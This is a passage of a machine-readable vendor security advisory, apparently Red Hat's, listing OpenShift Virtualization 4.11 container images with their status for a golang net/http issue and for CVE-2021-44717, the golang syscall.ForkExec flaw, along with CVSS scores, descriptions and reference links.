"8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: limit growth of header canonicalization cache", }, { cve: "CVE-2021-44717", cwe: { id: "CWE-200", name: "Exposure of Sensitive Information to an Unauthorized Actor", }, discovery_date: "2021-12-09T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030806", }, ], notes: [ { category: "description", text: "There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: don't close fd 0 on ForkExec error", title: "Vulnerability summary", }, { category: "other", text: "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw's impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44717", }, { category: "external", summary: "RHBZ#2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44717", url: "https://www.cve.org/CVERecord?id=CVE-2021-44717", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: 